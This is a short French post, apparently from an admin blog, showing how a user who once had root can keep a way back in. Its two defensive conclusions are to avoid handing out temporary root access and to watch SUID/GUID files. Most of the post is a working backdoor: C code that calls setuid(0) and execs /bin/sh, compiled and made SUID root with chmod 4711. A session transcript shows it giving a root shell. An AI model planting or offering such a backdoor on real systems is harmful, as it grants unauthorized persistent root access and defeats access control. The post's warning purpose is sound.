Script pour repasser root

Une fois qu’un user a eu les droits root une fois, il est très simple pour lui de se créer un moyen de repasser root ultérieurement sans avoir à rentrer de mot de passe…

Conclusion:

  • Ne pas donner un accès root à un user en se disant que de toute façon on changera le mot de passe après.
  • Surveiller les fichiers SUID/GUID du système
$ cat /tmp/back.c   

#include <unistd.h>  
int main(int ac, char av)  
{  
setuid(0);  
setgid(0);  
execl("/bin/sh", "sh", 0);  
}
# gcc -o backd back.c  
# chmod 4711 backd  
# ll /tmp/|grep back  
-rw-r--r-- 1 root root 101 Apr 13 11:01 back.c  
-rws--x--x 1 root root 7242 Apr 13 11:02 backd  
$ ./backd   
sh-3.00# id  
uid=0(root) gid=0(root) groupes=[...]  
sh-3.00#   
sh-3.00# whoami  
root  
sh-3.00#